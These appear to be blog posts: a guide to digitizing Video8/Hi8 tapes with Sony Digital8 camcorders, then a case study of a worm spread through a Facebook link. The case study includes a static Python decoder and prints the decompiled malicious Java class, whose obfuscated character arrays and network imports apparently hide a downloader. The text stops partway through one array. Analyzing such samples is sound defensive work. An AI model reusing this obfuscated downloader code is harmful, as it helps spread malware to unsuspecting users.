## Digitizing Video8 and Hi8 recordings

After our dog passed away, my boyfriend asked me what the options were for digitizing Video8 recordings that he had made of her when she was younger. I gladly looked into the task, since I am very fond of digitizing analogue recordings. This write-up is here to help those of you who want to do the same thing.

### Using a video capture card (video grabber) and an analogue playback device

If you still have a Video8/Hi8 camera, or any equipment capable of playing back Video8/Hi8 recordings, then you can simply play your tapes on it and capture the result via the A/V outputs of this device connected to a video grabber plugged into your computer. Of course, this is a generic solution that works for any equipment with analogue outputs, so it’s not strictly limited to 8mm tapes. There is a myriad of video grabbers, ranging from the absurdly cheap EasyCAP USB adapters that you can get for a few bucks off Amazon or eBay, to professional-grade hardware cards produced by Blackmagic, Advantech or Pinnacle that connect to the computer via PCI, PCI-E, or FireWire.

It is very important to note that, if you have any tapes recorded in LP mode, it is very preferable to play them back on the same camera (not just the same make/model, but the exact same camera) as the one that recorded them. If you don’t have that camera anymore, you may be out of luck – other cameras might not be able to play back the tape at all. Or they might be – LP mode is very dependent on the hardware for a reason that I’m not really sure of.

This solution is probably good enough for most people, given the limited quality of home movies made with consumer-grade equipment and the limited resolution of Video8. If you connect the playback equipment to the video grabber via the S-Video port, you can be pretty sure that you’re getting the best quality possible with such a setup. However, you have to remember that the quality is still dependent on a number of external factors :

• the quality of A/V outputs in the playback equipment – some of the cameras don’t even have an S-Video output port (mine doesn’t),
• external interference to the analogue signal during playback,
• the quality of the capture card, which is probably the most important thing of these three.

Having all that in mind, I opted for a different solution to which the rest of the article will be devoted. This does not mean that you should, too : if you don’t have the time or money to play around with some other legacy hardware, get a USB grabber and you’re good to go.

### Using a Digital8 camera capable of Video8/Hi8 playback

Back in the day when digital audio and video were a relatively new thing on consumer-grade camcorders, there were two physical formats to choose from : MiniDV and Digital8. MiniDV was rather widespread, with lots of different manufacturers offering their own camcorders which recorded stuff onto MiniDV tapes. Digital8 was introduced by Sony, who was also the main manufacturer of Digital8 camcorders, with Hitachi making a few models for a short time, and possibly others. The formats did not differ on the logical level at all : both stored raw DV (Digital Video) compressed content on magnetic tape. However, there was a big advantage of the Digital8 format from the point of view of users who had had their recordings stored on Video8 and Hi8 tapes : the physical dimensions of the tapes were exactly the same, and a lot of camcorders were capable of playing back Video8/Hi8 recordings and outputting digitized content into their DV (aka iLink, or simply 4-pin FireWire) output port.

I think this solution is superior to the one presented before, mainly because the sole responsibility of digitizing the content lies on the camcorder. In my opinion, it is quite reasonable to expect the circuitry inside a Digital8 camcorder to produce somewhat better quality digitized content than a video grabber and a Video8 camera. Additionally, Sony equipped some of its Digital8 camcorders with two important features : DNR, Digital Noise Reduction, which aims to (duh) reduce noise in the analogue recordings, and TBC – Time Base Correction, which helps it track the analogue tape correctly. Thus, I find it rather rational to expect a Digital8 camcorder to perform better in terms of playback than a normal Video8/Hi8 one, assuming that the tape is in SP mode (read above for my remarks concerning LP mode tapes).

However, not all Digital8 camcorders are created equal. It seems like Video8/Hi8 playback was considered by Sony to be an important feature only at the start of Digital8 : while practically all early camcorders have this capability – as well as TBC and DNR – it only appears among the higher-end models produced later on (say, 2004-2007, when the format was retired).

In order to aid you in choosing a good Digital8 camcorder for digitizing analogue content, I compiled this list that you can use as reference. It is by no means complete and may be incorrect. Whether the camera supports analogue playback (and TBC+DNR) was inferred by reading the manuals available from Sony.

• DCR-TRV130
• DCR-TRV140
• DCR-TRV145
• DCR-TRV147
• DCR-TRV245
• DCR-TRV250
• DCR-TRV255
• DCR-TRV260
• DCR-TRV265
• DCR-TRV270
• DCR-TRV280
• DCR-TRV285
• DCR-TRV380

• DCR-TRV103
• DCR-TRV110
• DCR-TRV203
• DCR-TRV210
• DCR-TRV310
• DCR-TRV315

#### Digital8 camcorders with Video8/Hi8 playback, supporting TBC and DNR

• DCR-TRV120
• DCR-TRV125
• DCR-TRV230
• DCR-TRV235
• DCR-TRV240
• DCR-TRV320
• DCR-TRV325
• DCR-TRV330
• DCR-TRV340
• DCR-TRV345
• DCR-TRV350
• DCR-TRV351
• DCR-TRV355
• DCR-TRV356
• DCR-TRV430
• DCR-TRV480
• DCR-TRV520
• DCR-TRV525
• DCR-TRV530
• DCR-TRV720
• DCR-TRV730
• DCR-TRV740
• DCR-TRV820
• DCR-TRV828
• DCR-TRV830
• DCR-TRV840

You will also find that all these camcorders come in two flavours : NTSC and PAL. PAL ones have an E at the end of the model name. If the analogue recordings were recorded in PAL, you obviously need a PAL Digital8 camcorder to play them back. I found that analogue playback capabilities don’t differ between NTSC and PAL models, but it never hurts to check : the Sony support website still has manuals for all the models.

You should also note that some of these camcorders are capable of digitizing any analogue input signal, not just analogue tapes. This way, you could connect a VCR or some other analogue device to the camcorder, and use it to digitize the content. This may or may not be better than simply hooking up the VCR directly to the computer via a video grabber, but your mileage may vary.

Check Amazon, eBay, and your local pawn shops for these models. Unfortunately, the ones capable of analogue playback are still quite pricey. I was lucky enough to find a TRV120E for 250zł (~$70). It was a bargain, since these models usually go for higher prices around here.

Once you get your Digital8 camcorder and make sure that TBC and DNR are enabled, play a Video8/Hi8 tape, hook it up to your computer via a FireWire port, and start capturing. If you’re on Windows, I remember WinDV working pretty great back in my MiniDV days, and according to various reports from around the net it still works well even on Windows 8. If you’re using Linux, use dvgrab – it even has an interactive mode so you can control the camera via the FireWire interface. It is a command-line program, but there’s nothing stopping you from having live preview if you want it – just pipe the output through tee and to your favourite video player : something like `dvgrab - | tee dvgrab.dv | vlc -` will work.

Hope you have fun reliving your past memories!

## Worms distributed via Facebook : a case study

Today, I got a message from one of my friends on Facebook that was essentially a link to a zip file. Without thinking much, I messaged him back asking him to check his computer for infections and whatnot, since it seems like he’s spreading malicious software without even knowing it. However, I downloaded the file and was curious about its contents. The zip file contained just one JAR, which I disassembled with the Java Decompiler.
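The decompiled class reproduced below builds each of its strings from an array of small integer expressions (`"85347/783"`, `"-3448+3560"`, and so on), evaluates every element with the `js` script engine and casts the result to a `char`. As an added example, not part of the original post, this Python decoder recovers such strings statically with a strict integer parser, so nothing taken from the sample is ever handed to an interpreter. The function names are this example's own; the `HYOZXBQ` array in the sample input is copied from the class below, while the wrapper class and the `LABELS` array are constructed.

```python
import re

# One obfuscated character: signed integer, a single + - or /, unsigned integer.
# These are the only operators that appear in the decompiled arrays.
EXPR = re.compile(r"([+-]?\d+)\s*([+\-/])\s*(\d+)", re.ASCII)
# `String[] NAME = { "...", ... };` as the decompiler prints it.
ARRAY = re.compile(r"String\[\]\s+(\w+)\s*=\s*\{(.*?)\}\s*;", re.DOTALL)
LITERAL = re.compile(r'"([^"\\]*)"')


class DecodeError(ValueError):
    """Raised when an element is not a plain integer expression."""


def eval_expr(expr):
    """Evaluate one 'a op b' element using integer arithmetic only."""
    m = EXPR.fullmatch(expr.strip())
    if m is None:
        raise DecodeError(f"not an integer expression: {expr!r}")
    a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
    if op == "+":
        value = a + b
    elif op == "-":
        value = a - b
    else:
        # The Java code feeds the result to Integer.parseInt, so a division
        # that is not exact would not be a valid character there either.
        if b == 0 or a % b != 0:
            raise DecodeError(f"division is not exact: {expr!r}")
        value = a // b
    if not 0 <= value <= 0xFFFF:  # the result is cast to a 16-bit Java char
        raise DecodeError(f"result outside char range: {expr!r}")
    return value


def decode_array(exprs):
    """Turn a list of expressions into the string they spell out."""
    return "".join(chr(eval_expr(e)) for e in exprs)


def extract_arrays(java_src):
    """Map every String[] initialiser in the source to its list of literals."""
    return {m.group(1): LITERAL.findall(m.group(2))
            for m in ARRAY.finditer(java_src)}


def decode_source(java_src):
    """Decode every array made up entirely of integer expressions.

    Arrays containing anything else are skipped rather than evaluated.
    """
    decoded = {}
    for name, exprs in extract_arrays(java_src).items():
        if not exprs:
            continue
        try:
            decoded[name] = decode_array(exprs)
        except DecodeError:
            continue
    return decoded


# Sample input. HYOZXBQ is the short array from the decompiled class on this
# page; the surrounding class and the LABELS array are constructed.
SAMPLE = r'''
public class Sample {
    public static String path() {
        String[] HYOZXBQ = { "1115-1048", "-6817+6875", "-3904+3996",
            "-5117+5209", "5298-5214", "-2006+2107", "85347/783",
            "-3448+3560", "538936/5858", "7300-7208" };
        String[] LABELS = { "hello", "world" };
        return null;
    }
}
'''

if __name__ == "__main__":
    # repr() keeps backslashes and control characters visible in the output.
    for name, text in decode_source(SAMPLE).items():
        print(f"{name} -> {text!r}")
```

Run against the full decompiler output, `decode_source` returns one entry per obfuscated array; print the results with `repr()` as shown and treat them as untrusted data.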
The archive contained only one class, which looked like this : import java.io.File; import java.io.IOException; import java.io.InputStream; import java.net.HttpURLConnection; import java.net.URI; import java.net.URL; import java.nio.file.CopyOption; import java.nio.file.Files; import java.nio.file.Paths; import java.text.DecimalFormat; import javax.script.ScriptEngine; import javax.script.ScriptEngineManager; import javax.script.ScriptException; public class SEHKFCJZGYHEDGSCHJBKM { public static String PACVA() throws ScriptException { ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager(); ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js"); String[] FMMNX = { "461136/4434", "-740+856", "-1351+1467", "7318-7206", "-6018+6076", "-5833+5880", "8921-8874", "-3549+3649", "2156-2048", "66010/1435", "5236-5136", "6455-6341", "-3201+3312", "-6069+6181", "-8068+8166", "723165/6515", "-866+986", "296-179", "-8422+8537", "940714/9314", "153216/1344", "980100/9900", "4586-4475", "8896-8786", "934-818", "325220/3220", "755150/6865", "-2768+2884", "1040-994", "-4323+4422", "4358-4247", "-8361+8470", "-3568+3615", "9307-9192", "367399/7817", "6364-6309", "680882/5581", "-9530+9627", "-6313+6427", "-5956+6074", "4048-3946", "996516/9227", "188734/1586", "-1297+1345", "49950/925", "-7790+7899", "120491/2459", "-4500+4606", "932715/8883", "375678/6957", "-821+868", "2350-2250", "-5300+5346", "4221-4121", "-6193+6290", "-9459+9575", "503685/7995", "8617-8517", "-751+859", "352824/5784", "473634/9666", "5740-5676", "-4301+4365", "9091-8987", "388948/3353", "-2422+2538", "1036448/9254", "-1145+1203", "338635/7205", "114962/2446", "5729-5629", "3460-3352", "438242/9527", "15300/153", "712386/6249", "29304/264", "-3670+3782", "-6717+6815", "169608/1528", "5796-5676", "3704-3587", "5110-4995", "4639-4538", "823878/7227", "-7619+7718", "3775-3664", "-5896+6006", "1583-1467", "515504/5104", "-3088+3198", "9432-9316", "-8803+8849", "973467/9833", 
"41958/378", "5618-5509", "410498/8734", "6263-6148", "3440-3393", "-8165+8280", "4485-4388", "3499-3448", "765856/6838", "-8928+8982", "949977/7983", "146946/1289", "6836-6714", "165750/1625", "5648-5600", "534726/4383", "5549-5428", "-7817+7872", "2329-2224", "364656/7597", "6840-6793", "204500/2045", "6791-6745", "-858+958", "-933+1030", "-6006+6122", "438669/6963", "464400/4644", "-9655+9763", "-4675+4736", "4630-4581", "255552/3993", "65728/1027", "282-178", "24244/209", "521884/4499", "4370-4258", "428852/7394", "-8317+8364", "-6763+6810", "-5202+5302", "970488/8986", "2514-2468", "1832-1732", "1523-1409", "23643/213", "1103424/9852", "5326-5228", "-6127+6238", "-3871+3991", "6867-6750", "392725/3415", "-4749+4850", "-5776+5890", "-3205+3304", "-7456+7567", "8827-8717", "-9022+9138", "864762/8562", "-9006+9116", "830-714", "9665-9619", "-5379+5478", "515928/4648", "232-123", "920-873", "679880/5912", "954-907", "-7518+7633", "1055020/9095", "5730-5631", "9911-9792", "-216+338", "-8026+8140", "902779/9307", "3459-3358", "6858-6740", "4569-4515", "5635-5520", "969870/8817", "-1690+1745", "-2335+2386", "-1700+1755", "-3491+3538", "1768-1668", "-8527+8573", "940400/9404", "51+46", "1070332/9227", "475965/7555", "876500/8765", "110160/1020", "-8488+8549", "6513-6464", "-3977+4041", "275008/4297", "271-167", "24+92", "-8228+8344", "-7760+7872", "348986/6017", "276595/5885", "408383/8689", "489200/4892", "-4338+4446", "411424/8944", "1099-999", "8779-8665", "577755/5205", "787360/7030", "5202-5104", "849261/7651", "4570-4450", "5673-5556", "9854-9739", "570-469", "9859-9745", "256806/2594", "-7435+7546", "1003-893", "586844/5059", "391072/3872", "7810/71", "-2739+2855", "5815-5769", "769527/7773", "2882-2771", "-5331+5440", "3704-3657", "-223+338", "43+4", "-7771+7893", "-1857+1912", "29606/262", "157-38", "-4504+4612", "14859/127", "-3845+3899", "52+45", "205-153", "9406-9305", "-159+257", "1221-1104", "-4114+4228", "356304/6852", "300050/6001", "-3154+3201", 
"670600/6706", "-1535+1581", "-353+453", "22116/228", "-2494+2610", "-8650+8713", "58900/589", "537948/4981", "7183-7122", "-4825+4874", "-5980+6044", "4230-4166", "681-577", "3211-3095", "-3992+4108", "3505-3393", "3529-3471", "367352/7816", "222169/4727", "-2078+2178", "-1343+1451", "9926-9880", "-5404+5504", "-8830+8944", "-212+323", "172368/1539", "6795-6697", "668220/6020", "1170-1050", "1568-1451", "-6107+6222", "468842/4642", "4864-4750", "-9579+9678", "516039/4649", "10061-9951", "892736/7696", "271690/2690", "22770/207", "695420/5995", "-6274+6320", "8463-8364", "3889-3778", "79352/728", "103823/2209", "112815/981", "183488/3904", "-900+1010", "7202-7105", "-6126+6230", "1888-1780", "-7554+7609", "7958-7909", "353685/6205", "757460/6260", "314-196", "-1626+1675", "-4310+4409", "955800/8850", "239904/2352", "63448/616", "77688/747", "-8671+8718", "-6461+6561", "7146-7100", "6634-6534", "745348/7684", "-9099+9215", "-8588+8651", "948900/9489", "5333-5225", "5673-5612", "-2901+2950", "8802-8738", "3540-3476", "515320/4955", "328744/2834", "9929-9813", "-2114+2226", "310648/5356", "1343-1296", "-9606+9653", "392100/3921", "953748/8831", "298356/6486", "-1503+1603", "-8551+8665", "6414-6303", "-6596+6708", "40474/413", "-9106+9217", "312000/2600", "634842/5426", "-7126+7241", "604990/5990", "1573-1459", "6356-6257", "-4539+4650", "-1946+2056", "-404+520", "-7874+7975", "177100/1610", "8260-8144", "6378-6332", "-9413+9512", "8608-8497", "7745-7636", "9396-9349", "5069-4954", "-2046+2093", "75504/1573", "8980-8931", "-8443+8544", "704-587", "3704-3650", "-8226+8344", "9739-9682", "-8466+8573", "297654/5222", "1103106/9762", "792400/7924", "231876/2052", "-175+296", "-9148+9264", "861840/7980", "3479-3432", "637-537", "1881-1835", "-4621+4721", "-6429+6526", "30972/267", "401058/6366", "8269-8169", "-1446+1554", "1524-1463", "-607+656", "544384/8506", "-77+141", "910936/8759", "-6292+6408", "-952+1068", "432-320", "4503-4445", "4280-4233", "63403/1349", 
"1630-1530", "-3359+3467", "8694-8648", "-9898+9998", "-9501+9615", "-8317+8428", "344400/3075", "7918-7820", "1937-1826", "550440/4587", "566748/4844", "-664+779", "1921-1820", "-4745+4859", "-90+189", "5102-4991", "512710/4661", "4931-4815", "9354-9253", "1841-1731", "1935-1819", "7728-7682", "-984+1083", "-2320+2431", "-6061+6170", "-9297+9344", "8749-8634", "172772/3676", "7104-6995", "167100/3342", "3885-3765", "249730/2210", "5086-4983", "5991-5872", "255702/2243", "1102452/9932", "-7111+7229", "901-786", "1022814/8742", "-8849+8899", "-2120+2234", "-4544+4592", "211600/1840", "-6274+6321", "-4806+4906", "1503-1457", "9123-9023", "-9471+9568", "1673-1557", "516663/8201", "168100/1681", "1271-1163", "4968-4907", "455798/9302", "178-114", "3851-3787", "-8979+9083", "219588/1893", "-8409+8525", "-5166+5278", "267728/4616", "-718+765", "1175/25", "-3527+3627", "372168/3446", "3410-3364", "163000/1630", "226404/1986", "434676/3916", "-4681+4793", "-9164+9262", "-3548+3659", "693360/5778", "-2693+2810", "-2637+2752", "717908/7108", "5303-5189", "-2731+2830", "-723+834", "104610/951", "-9596+9712", "3026-2925", "-6041+6151", "-8848+8964", "-3271+3317", "873378/8822", "-138+249", "553284/5076", "64907/1381", "1024075/8905", "8630-8583", "1004880/8374", "-5564+5685", "9321-9214", "-5459+5513", "-7983+8102", "9532-9418", "472920/8445", "9424-9307", "8710-8659", "-2118+2175", "-2895+2951", "727872/7136", "243800/4600", "-4843+4956", "-1623+1740", "127-80", "563900/5639", "-5123+5169", "-1379+1479", "-8028+8125", "-1526+1642", "-1564+1627", "-1387+1487", "5269-5161", "465674/7634", "9599-9550", "559488/8742", "255168/3987", "-8692+8796", "-5448+5564", "333964/2879", "146272/1306", "316912/5464", "-2654+2701", "55789/1187", "2830-2730", "-8025+8133", "-5354+5400", "-3513+3613", "7889-7775", "2562-2451", "4618-4506", "-7661+7759", "-4752+4863", "4344-4224", "265473/2269", "3999-3884", "6425-6324", "503082/4413", "-7247+7346", "1099233/9903", "3503-3393", "-4022+4138", 
"989901/9801", "702570/6387", "-1096+1212", "9719-9673", "6204-6105", "173493/1563", "3937-3828", "350009/7447", "475180/4132", "296899/6317", "441408/9196", "932047/9049", "408250/8165", "-9133+9187", "4282-4176", "-6171+6221", "3945-3892", "-1269+1369", "-9425+9534", "-5759+5862", "378399/3409", "-1606+1718", "5063-4944", "-4926+5029", "22896/216", "-1693+1740", "398400/3984", "5979-5933", "422100/4221", "699-602", "-9025+9141", "1005-942", "6836-6736", "-16+124", "6865-6804", "-7532+7581", "5546-5482", "9849-9785", "236392/2273", "3646-3530", "9700-9584", "1829-1717", "-4694+4752", "1674-1627", "215072/4576", "571100/5711", "-2242+2350", "4911-4865", "7494-7394", "4328-4214", "786324/7084", "1504-1392", "-1287+1385", "7438-7327", "-9758+9878", "1113255/9515", "149270/1298", "7910-7809", "-5446+5560", "-2597+2696", "8403-8292", "6187-6077", "912456/7866", "459752/4552", "-4820+4930", "603200/5200", "204102/4437", "-3759+3858", "-70+181", "-5797+5906", "-1775+1822", "9660-9545", "-4374+4421", "1632-1580", "-375+473", "302100/5700", "4544-4434", "156528/3261", "1140984/9752", "367696/6566", "8507-8406", "4765-4646", "354046/2926", "-1438+1542", "97965/933", "814890/7086", "214434/2166", "21411/183", "8063-8016", "459100/4591", "3599-3553", "720300/7203", "-1964+2061", "8943-8827", "130473/2071", "-7369+7469", "-6776+6884", "250893/4113", "-6563+6612", "-941+1005", "-2639+2703", "2532-2428", "576984/4974", "927072/7992", "-1031+1143", "8464-8406", "8908-8861", "-3720+3767", "339-239", "-4228+4336", "-8837+8883", "382300/3823", "1074678/9427", "-5054+5165", "-9446+9558", "863380/8810", "4664-4553", "3616-3496", "503919/4307", "-9418+9533", "2968-2867", "4701-4587", "45639/461", "2066-1955", "-7918+8028", "156832/1352", "4354-4253", "241120/2192", "591368/5098", "9411-9365", "576873/5827", "1631-1520", "-5437+5546", "-1804+1851", "4344-4229", "64390/1370", "270000/2250", "-4596+4695", "292215/2415", "-8277+8328", "4545-4491", "-1386+1437", "2346-2243", "-9088+9138", 
"3061-2958", "446742/8273", "-9369+9481", "5751-5698", "-4641+4745", "9108-9056", "-8694+8802", "3055/65", "835400/8354", "340-294", "-8685+8785", "-9353+9450", "-8575+8691", "6216-6153", "-6815+6915", "131976/1222", "2132-2071", "169246/3454", "-4519+4583", "7969-7905", "-1108+1212", "774184/6674", "2204-2088", "-2068+2180", "-184+242", "138509/2947", "170798/3634", "-1783+1883", "-9583+9691", "7109-7063", "233100/2331", "5122-5008", "-1388+1499", "-6357+6469", "5294-5196", "522255/4705", "481200/4010", "-6150+6267", "-8036+8151", "4379-4278", "795264/6976", "-4116+4215", "-914+1025", "2300-2190", "760032/6552", "5831-5730", "281050/2555", "818844/7059", "-258+304", "879219/8881", "-5270+5381", "-2550+2659", "103447/2201", "1080655/9397", "49397/1051", "3042-2921", "7728-7618", "5783-5662", "597380/5020", "7047-6933", "475266/8338", "3835-3715", "-1532+1648", "-3819+3936", "921100/7550", "2370-2253", "984507/9201", "8428-8331", "242350/4847", "-7520+7628", "4899-4852", "-4573+4673", "56672/1232", "884900/8849", "9778-9681", "310184/2674", "4174-4111", "-2481+2581", "-3565+3673", "2263-2202", "-2248+2297", "521344/8146", "783-719", "-8178+8282", "1127-1011", "292436/2521", "-3505+3617", "6152-6094", "6926-6879", "-5292+5339", "9172-9072", "-5868+5976", "-2886+2932", "-3792+3892", "307002/2693", "-8309+8420", "3722-3610", "796152/8124", "4108-3997", "9196-9076", "1141452/9756", "-5524+5639", "1509-1408", "-3635+3749", "-3524+3623", "743145/6695", "797940/7254", "3518-3402", "-3765+3866", "9318-9208", "321320/2770", "420992/9152", "54450/550", "3860-3749", "-2989+3098", "341878/7274", "259-144", "8592-8545", "2389-2287", "436696/4199", "29925/525", "241920/4480", "986391/8289", "180166/1514", "-5867+5974", "9682/94", "860328/7966", "95139/961", "109000/2180", "-6475+6583", "-1977+2085", "-9341+9440", "-1184+1238", "-2754+2801", "417-317", "184322/4007", "664800/6648", "-158+255", "724072/6242", "433062/6874", "831900/8319", "8219-8111", "2406-2345", "458-409", 
"7627-7563", "-8126+8190", "5123-5019", "2252-2136", "2215-2099", "-9857+9969", "-9502+9560", "9783-9736", "49585/1055", "-5483+5583", "5281-5173", "-5999+6045", "-9863+9963", "-4708+4822", "1106559/9969", "4170-4058", "564480/5760", "14541/131", "715560/5963", "2041-1924", "-1677+1792", "-1512+1613", "4193-4079", "8046-7947", "-2698+2809", "-1917+2027", "9262-9146", "564590/5590", "1096590/9969", "207524/1789", "-4853+4899", "-8373+8472", "-5724+5835", "-3859+3968", "9027-8980", "5481-5366", "440719/9377", "1096692/9294", "7994-7937", "-5094+5204", "-923+971", "140178/1149", "-2102+2223", "217455/2071", "7503-7399", "67275/575", "117502/1199", "-96+212", "732950/6850", "150654/1266", "935180/8132", "9140-9026", "3965-3918", "457500/4575", "-5149+5195", "-7968+8068", "-4507+4604", "4628-4512", "8529-8466", "-1951+2051", "142128/1316", "2803-2742", "2981-2932", "373888/5842", "-7803+7867", "-3481+3585", "867912/7482", "1098056/9466", "4589-4477", "523102/9019", "466099/9917", "3150-3103", "2871-2771", "3787-3679", "1985-1939", "2191-2091", "896-782", "-9742+9853", "-4046+4158", "-1825+1923", "-7838+7949", "-2369+2489", "127881/1093", "-3133+3248", "-15+116", "-4074+4188", "6263-6164", "-6760+6871", "498740/4534", "327-211", "677003/6703", "963050/8755", "-4744+4860", "159666/3471", "-8843+8942", "556998/5018", "-6050+6159", "-9492+9539", "-2911+3026", "-6888+6935", "10000-9898", "80605/1645", "840000/8000", "6044-5935", "9004-8956", "-5620+5671", "6921-6820", "8709-8605", "282204/2613", "551799/5157", "1462-1346", "196040/1690", "-1502+1558", "724500/6300", "-7241+7344", "-7042+7089", "2987-2887", "2998-2952", "948700/9487", "665032/6856", "5215-5099", "1685-1622", "635500/6355", "886032/8204", "-3041+3102", "-6426+6475", "-5368+5432", "-8437+8501", "3314-3210", "502512/4332", "8226-8110", "384-272", "-8085+8143", "-9624+9671", "4735-4688", "6298-6198", "2133-2025", "-9580+9626", "936800/9368", "468996/4114", "598401/5391", "1006432/8986", "-5164+5262", 
"223554/2014", "297-177", "-5081+5198", "1079505/9387", "3150-3049", "539106/4729", "-3266+3365", "7775-7664", "632-522", "8914-8798", "125846/1246", "-9813+9923", "336052/2897", "-8495+8541", "421146/4254", "543900/4900", "8900-8791", "1569-1522", "53130/462", "5283-5236", "-1876+1979", "1765-1709", "-5496+5597", "2527-2478", "6443-6392", "4589-4480", "949192/8044", "-1969+2082", "62496/1116", "1665-1616", "426351/3841", "8514-8407", "5502-5395", "-6205+6306", "202200/1685", "-9673+9720", "-3528+3628", "8190-8144", "792900/7929", "-3097+3194", "42920/370", "512379/8133", "1682-1582", "-9799+9907", "325374/5334", "-3629+3678", "9373-9309", "9910-9846", "8492-8388", "3709-3593", "-314+430", "773024/6902", "-4498+4556", "-3051+3098", "-1877+1924", "3973-3873", "9126-9018", "405674/8819", "-3324+3424", "7576-7462", "-2002+2113", "-3676+3788", "-2123+2221", "3391-3280", "-4212+4332", "285948/2444", "8375-8260", "85244/844", "-1212+1326", "5731-5632", "1014984/9144", "943470/8577", "1032400/8900", "5703-5602", "564520/5132", "1021728/8808", "-7969+8015", "100089/1011", "4250-4139", "-2662+2771", "-9744+9791", "-1809+1924", "-6689+6736", "-5495+5610", "26553/501", "240450/4809", "123157/1151", "1470-1370", "6683-6576", "7646-7543", "892944/8268", "-7903+8008", "-9493+9604", "4522-4408", "6733-6626", "2491-2382", "63648/1326", "-974+1093", "-7375+7422", "5360-5260", "-8597+8643", "9792-9692", "9606-9509", "6430-6314", "8674-8611", "3806-3706", "-4287+4395", "556564/9124", "-3391+3440", "-2978+3042", "79680/1245", "-6071+6175", "-5385+5501", "1045624/9014", "210560/1880", "3916-3858", "2362-2315", "9389-9342", "5879-5779", "-7364+7472", "-1520+1566", "3252-3152", "578436/5074", "-6109+6220", "-5976+6088", "585550/5975", "-9446+9557", "985440/8212", "1038609/8877", "-4636+4751", "-1572+1673", "623124/5466", "8179-8080", "-2712+2823", "167640/1524", "9021-8905", "202404/2004", "5054-4944", "216920/1870", "-3310+3356", "4209-4110", "-2159+2270", "340734/3126", "120179/2557", 
"-7902+8017", "7412-7365", "903096/8362", "-4047+4148", "242403/2499", "9298-9198", "-8192+8307", "486304/4676", "6598-6487", "-8030+8145", "-6241+6344", "-4493+4597", "4185-4067", "-879+989", "-3459+3513", "349997/3271", "976852/9484", "5966-5919", "-3411+3511", "182344/3964", "2235-2135", "7625-7528", "-7574+7690", "8912-8849", "-1478+1578", "-1709+1817", "3538/58", "4054-4005", "2587-2523", "1259-1195", "237328/2282", "4533-4417", "-9724+9840", "9587-9475", "-8624+8682", "9025-8978", "-3505+3552", "-6776+6876", "-1127+1235", "252310/5485", "384000/3840", "-4909+5023", "4687-4576", "-5529+5641", "592018/6041", "2062-1951", "-875+995", "59+58", "5763-5648", "716696/7096", "5551-5437", "321948/3252", "3421-3310", "693440/6304", "622-506", "873246/8646", "-9724+9834", "6942-6826", "1506-1460", "3668-3569", "1292-1181", "-2209+2318", "57058/1214", "-4141+4256", "3517-3470", "7962-7845", "5442-5339", "99450/850", "972828/7974", "487600/4876", "-6947+7064", "2505-2396", "6178-6124", "704032/6286", "267978/2271", "1955-1851", "-4400+4508", "1463-1360", "-4385+4502", "105252/1074", "9915-9868", "883-783", "9997-9951", "583200/5832", "-4007+4104", "-1537+1653", "155736/2472", "897-797", "9380-9272", "150548/2468", "-8525+8574", "291200/4550", "-2519+2583", "8242-8138", "2537-2421", "-4458+4574", "-1294+1406", "288492/4974", "-788+835", "-2215+2262", "826500/8265", "-5590+5698", "8339-8293", "791200/7912", "5954-5840", "-4323+4434", "2041-1929", "-5629+5727", "2080-1969", "1836-1716", "6651-6534", "8934-8819", "469145/4645", "-9366+9480", "-9454+9553", "466533/4203", "771870/7017", "-5958+6074", "6190-6089", "858220/7802", "-2275+2391", "57316/1246", "-3802+3901", "-9335+9446", "1005961/9229", "54285/1155", "8518-8403", "-7823+7870", "307450/6149", "346492/3364", "7775-7668", "320096/5716", "713275/6925", "1961-1843", "-7369+7423", "4643-4531", "5602-5488", "2084-1967", "653400/6050", "1162511/9769", "-809+925", "5629-5519", "-9486+9592", "-5744+5791", "247900/2479", 
"261602/5687", "-6643+6743", "-767+864", "527800/4550", "2130-2067", "3956-3856", "-2052+2160", "1753-1692", "277291/5659", "10005-9941", "823-759", "3723-3619", "-3753+3869", "192676/1661", "744240/6645", "-140+198", "259111/5513", "391933/8339", "-3610+3710", "697032/6454", "267214/5809", "-6853+6953", "-4639+4753", "-7456+7567", "1496-1384", "-7036+7134", "6588-6477", "465000/3875", "5386-5269", "-6060+6175", "-4392+4493", "5983-5869", "2003-1904", "446331/4021", "8427-8317", "1067316/9201", "2233-2132", "-8164+8274", "739152/6372", "-9629+9675", "-8107+8206", "1020534/9194", "107583/987", "-8207+8254", "-8666+8781", "-4648+4695", "377178/3398", "-5933+6055", "439264/3922", "-5252+5349", "8800-8746", "1122360/9353", "6+99", "-9332+9383", "115453/1079", "-4461+4578", "523786/5186", "-7627+7681", "8467-8351", "3440-3318", "391771/3467", "412801/8783", "7523-7423", "336536/7316", "-530+630", "3983-3886", "-8944+9060", "3534-3471", "-8670+8770", "198936/1842", "179157/2937", "8888-8839", "88832/1388", "266176/4159", "-2528+2632", "653312/5632", "8506-8390", "109+3", "36540/630", "6264-6217", "-1044+1091", "-1096+1196", "3430-3322", "8166-8120", "7310-7210", "7328-7214", "666888/6008", "9133-9021", "-5775+5873", "21201/191", "-7771+7891", "205452/1756", "2727-2612", "1001617/9917", "807234/7081", "-9221+9320", "484737/4367", "972400/8840", "-5479+5595", "-9760+9861", "4590-4480", "-6944+7060", "4402-4356", "166815/1685", "-7593+7704", "-7229+7338", "-8145+8192", "949210/8254", "-5149+5196", "186-88", "90720/840", "385627/3187", "-9405+9519", "8432-8381", "10053-9940", "615069/5257", "9752-9644", "-2829+2945", "2163-2041", "410795/3395", "-5891+5945", "873886/7163", "7707-7597", "199302/1689", "5252-5205", "-1977+2077", "274528/5968", "4480-4380", "-5515+5612", "-1265+1381", "-358+421", "-770+870", "1871-1763", "6490-6429", "-3079+3128", "-649+713", "9720-9656", "127816/1229", "285-169", "8737-8621", "1812-1700", "431926/7447", "6575-6528", "444761/9463", 
